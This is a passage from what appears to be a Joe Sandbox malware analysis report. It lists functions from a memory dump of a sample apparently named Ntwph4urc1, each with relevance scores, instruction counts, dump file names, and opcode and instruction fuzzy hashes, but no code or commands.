                                              • Opcode Fuzzy Hash: ed239e9abffda92a0b57496fa8d50c22cd5aec9260d14a243e4e168f360e265f
                                              • Instruction Fuzzy Hash: 5551E2B15047049FE721DF29CD84F6A77E9EF857A4F20062DEA119B292DB30DC06C7A6
                                              Function 3693B2D3 Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2ae96f13e62a8038b23ccb08048a1730c7b12a772aeba8f04c25d69ae98cb5f
                                              • Instruction ID: cc0dd8850f333103859d525b63598434b2b4b8977d9da8dcccc206eac3f2faea
                                              • Opcode Fuzzy Hash: f2ae96f13e62a8038b23ccb08048a1730c7b12a772aeba8f04c25d69ae98cb5f
                                              • Instruction Fuzzy Hash: 6C41F171A027109FE716CF19CC80B16B7B9EF457A4F31442AF6499B295EB309C41CB90
                                              Function 369695DA Relevance: .2, Instructions: 160COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 934e10c426fd61bd8fe604d42b787c20ccf45b123ad7e35132740a4044cf7b71
                                              • Instruction ID: 185697fd9cdb1fac6868f884b1bf381e7bba76baaae49f0188ed9cffe7ad66cd
                                              • Opcode Fuzzy Hash: 934e10c426fd61bd8fe604d42b787c20ccf45b123ad7e35132740a4044cf7b71
                                              • Instruction Fuzzy Hash: 7D518D70900319AFEF21CFA6CC81B9DBBB9FF05354FA0012AE594AB152DB719948DF51
                                              Function 36953740 Relevance: .2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40b092e3c373cff9d8e4a34326211c42fd290127084dc6e40b34e6ab90e02a86
                                              • Instruction ID: 189590e813dd20e741949144fb9535ab4409b12828b1bce639d7381cf6fe0aa9
                                              • Opcode Fuzzy Hash: 40b092e3c373cff9d8e4a34326211c42fd290127084dc6e40b34e6ab90e02a86
                                              • Instruction Fuzzy Hash: 1A51DF79E10626EFE315CF68C880669B7B4FF08714F224269EA44DB740EB34E991C7D1
                                              Function 36A0D26B Relevance: .2, Instructions: 153COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                              • Instruction ID: 322ad3757882892fd06b99dec1ef3a7a359251e61ae6af4a23b352d06395c8db
                                              • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                              • Instruction Fuzzy Hash: E7514676608342AFD700DF69DC80B5ABBE5FB88348F04892DF9949B281D735E945CF92
                                              Function 369451ED Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1bf9f8846d8419a6ed823cd5bb5d00859a6a622030c640eda36208c0b2e5d6c
                                              • Instruction ID: acf7f279a94bae2473fb07f6ca013f3bcf9afba0e9571ead7de406bba1760a05
                                              • Opcode Fuzzy Hash: b1bf9f8846d8419a6ed823cd5bb5d00859a6a622030c640eda36208c0b2e5d6c
                                              • Instruction Fuzzy Hash: 81515B75A11319DBEB12EBE9CC40B9EB7F9AB04798F210019E801E7251DFB49D41CB91
                                              Function 369D3140 Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f83dfe7b1fb5d2b4eb7ee38be7b83156b2a0e8ba7e4fd33510b9c365dec1d908
                                              • Instruction ID: 5331544dd071745b6f5a0352c18270f67f807faa1139329a0e1d5d7dcc3d2332
                                              • Opcode Fuzzy Hash: f83dfe7b1fb5d2b4eb7ee38be7b83156b2a0e8ba7e4fd33510b9c365dec1d908
                                              • Instruction Fuzzy Hash: B051DB72A04311DFE711CF15C840A9AB7E8FF8A359F118529FA949B250D734ED46CBD2
                                              Function 3697F71F Relevance: .1, Instructions: 143COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58601a464886e6119215978d3944e0b9e5307785b96d685bb9a5a1df54d77678
                                              • Instruction ID: 118b1baaf9bf29315cd22638e1deb08e074124ded1e88e44319b082ed27e6cb1
                                              • Opcode Fuzzy Hash: 58601a464886e6119215978d3944e0b9e5307785b96d685bb9a5a1df54d77678
                                              • Instruction Fuzzy Hash: C44186B6D00729ABDB12DBA9CC80AAFB7BCAF04694F510166E914F7601EB34DD05C7E1
                                              Function 36A135D7 Relevance: .1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                              • Instruction ID: f120a6f00d3d9c31954addf6847fd9b579c4d4cec953af2ad161337988d825de
                                              • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                              • Instruction Fuzzy Hash: F5517CB560060AEFDB05CF14C980A56BBB5FF45348F1580AAE9089F222E771E986CB90
                                              Function 3694D534 Relevance: .1, Instructions: 138COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9698368704233a0bf7cf11af0b9332720ef5daf007ca4df8e11530872e9fa1cd
                                              • Instruction ID: 5aa60b0705f140c5fd74fd5a0e31277204b124cc0e7cad262bfa779f604166a3
                                              • Opcode Fuzzy Hash: 9698368704233a0bf7cf11af0b9332720ef5daf007ca4df8e11530872e9fa1cd
                                              • Instruction Fuzzy Hash: 7C51DE79B20791CFE722DB19C840B1A73E9EB48798F5600A9FC00CB695DB34DC44D6A2
                                              Function 3693B136 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aea05dc5a56b8cf28fc217a596e6f7de93df313c2fdfb646223fe7ac0b784191
                                              • Instruction ID: 083b3022ee9ff4f0e19eefabf7e05bd7530b07ca2ab6dca806b10dae3045bfcd
                                              • Opcode Fuzzy Hash: aea05dc5a56b8cf28fc217a596e6f7de93df313c2fdfb646223fe7ac0b784191
                                              • Instruction Fuzzy Hash: 0641CBB0A01305EFE711CFA5CD80B6ABBF8AF65794F204469E6159B251DB70DC01CB91
                                              Function 36A114F6 Relevance: .1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6554722e03fe1de2f80a892ce0e3365c5aabfeeb5412f646132f02fb756456d8
                                              • Instruction ID: 8926e05e6814260ca3a31c203fc3592e3bb3ba53d70f307c0f3eb4c381167fd4
                                              • Opcode Fuzzy Hash: 6554722e03fe1de2f80a892ce0e3365c5aabfeeb5412f646132f02fb756456d8
                                              • Instruction Fuzzy Hash: B141F375E10615DFEB09CF64CC80BEEBBB5BF48350F04016AE91A9B2A2D7369C50CB91
                                              Function 3696D6E0 Relevance: .1, Instructions: 126COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94abc28e667cc5161e4ff9b2c3e99f2d2178239e7d020a400afac3831f7ec08d
                                              • Instruction ID: a7f27ba8944d855d7a52c644510309e2009b45102a64e00c2b10bd47c0151222
                                              • Opcode Fuzzy Hash: 94abc28e667cc5161e4ff9b2c3e99f2d2178239e7d020a400afac3831f7ec08d
                                              • Instruction Fuzzy Hash: 4F41E4B15047409FD320DF29CD80A6AB7E9EF453A4F20052DED145B292DB30EC17DBA2
                                              Function 36A0BEE6 Relevance: .1, Instructions: 115COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                              • Instruction ID: 532c0d1d3714b6de5ef0c050931a993afa15fd8398e313c79ad8156a98808676
                                              • Opcode Fuzzy Hash: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                              • Instruction Fuzzy Hash: 1631237AA04651AFE3128B65EE84F6ABBE9EF45688F014151FD428F241DA36DC80CF90
                                              Function 36A17120 Relevance: .1, Instructions: 110COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                              • Instruction ID: e90c050acf3a12f6735fb3a8231ac69820c21b2cb75c34a0cd32b99e068af301
                                              • Opcode Fuzzy Hash: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                              • Instruction Fuzzy Hash: 4A4164B5A017049BD721CF76CD54E97B7ECEF44751F40491EA8A6DB2A1DB30EA00CB60
                                              Function 369E74B0 Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99099dcee9e6abc4ed7b0813c3cd031ab91567d6bcd76bb46a1b2d2f9132c064
                                              • Instruction ID: f80b63655d9d4f7cdc080a3fde147422f684d5448ed8849c53bd699298167819
                                              • Opcode Fuzzy Hash: 99099dcee9e6abc4ed7b0813c3cd031ab91567d6bcd76bb46a1b2d2f9132c064
                                              • Instruction Fuzzy Hash: 84417DB4A0030A9FEB06CF69C88479ABBA1FB49344F64C56DD449DF251DB32D942CB92
                                              Function 36969274 Relevance: .1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bad8e0a6c15298fa9edf48f0c0f1cc3cfc29907cb1ac3cc6f41381ae37b66da9
                                              • Instruction ID: c6542c9210522ed134386636e892112aee33b3a2bdf5f1c8c451f385b4b2527a
                                              • Opcode Fuzzy Hash: bad8e0a6c15298fa9edf48f0c0f1cc3cfc29907cb1ac3cc6f41381ae37b66da9
                                              • Instruction Fuzzy Hash: 0E31A475A0032DAFDB25CB25CC40F9AB7B9EF85764F510199A54CEB281DB309D44CF91
                                              Function 369EB2F0 Relevance: .1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                              • Instruction ID: 53d1f5c4ee6d79c4d9e1f76abfa2f4d7b21bf03a3913a2e6c4baf5810b673d68
                                              • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                              • Instruction Fuzzy Hash: DE31CE71A02711DFD722CF19C981A1AB7F8FF48350B64946DD5898B668E730E841CB80
                                              Function 36947E96 Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                              • Instruction ID: 511d52046feafd37200d488ee2df744c42fad19dbc677d37761a4316da1cb6ee
                                              • Opcode Fuzzy Hash: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                              • Instruction Fuzzy Hash: 71315A70A0178ABEE706EB74CC90BD9FB98BF01108F244159C11C8F202DB34691AC7E2
                                              Function 369650E4 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                              • Instruction ID: f6704d994a37bcc2c541d3b79ae294a40de4ae6d1b130a6c25783e04f1d817b3
                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                              • Instruction Fuzzy Hash: 49313671A083419BE711CE1AC850757B7E8AB847ACF668129F4848B295D734CC41C7E2
                                              Function 3693DEA5 Relevance: .1, Instructions: 98COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8dec9e20f3000790e13a40ccef3edbcd804ac2a46383a05a6b1087edaf6fe7c0
                                              • Instruction ID: 86c2f232791b8f220013b079cf46ef99978bd43a9a1bd768c489af5de09b5a15
                                              • Opcode Fuzzy Hash: 8dec9e20f3000790e13a40ccef3edbcd804ac2a46383a05a6b1087edaf6fe7c0
                                              • Instruction Fuzzy Hash: 54319CB1611701DFD329CF18CCA0A6AB7B9EF85388B70851DE1059B652EB71EC4ACBD0
                                              Function 3693D6AA Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                              • Instruction ID: 2db18bebcd5b1e463040240d23e2917d0339fd354faa563c45a709456c46d48a
                                              • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                              • Instruction Fuzzy Hash: 9231D5FAA02214AFEB11CE55C990F5E73BDEB84794F358428ED059B211D770DD48CB91
                                              Function 3693DE10 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 12dcfbec6a7daaba74d0a0bd789557ee88d95d578e84717b7c199045a8795bdb
                                              • Instruction ID: 63062b3e8e1dd99bfd9b36cf8df529d112af9b256eab61a0524414da65e5beb6
                                              • Opcode Fuzzy Hash: 12dcfbec6a7daaba74d0a0bd789557ee88d95d578e84717b7c199045a8795bdb
                                              • Instruction Fuzzy Hash: 8641A3B1D01358DEDB64CFAAD980AEDFBF4BB48300F6041AEE509A7241DB349A85CF51
                                              Function 369492C5 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                              • Instruction ID: 7cc4982b47e72d2857174fe722744b3ef2f44465dddf742928fddb8dc77fee76
                                              • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                              • Instruction Fuzzy Hash: BB3198B26083098FC702DF19D840A4ABBE9FF8A354F15056AF854DB3A1DB30DC14CBA6
                                              Function 36997190 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                              • Instruction ID: 2e608648736292173e1e9eb38292133dbe6637dbb506a6d182ce45cdfd70dcb1
                                              • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
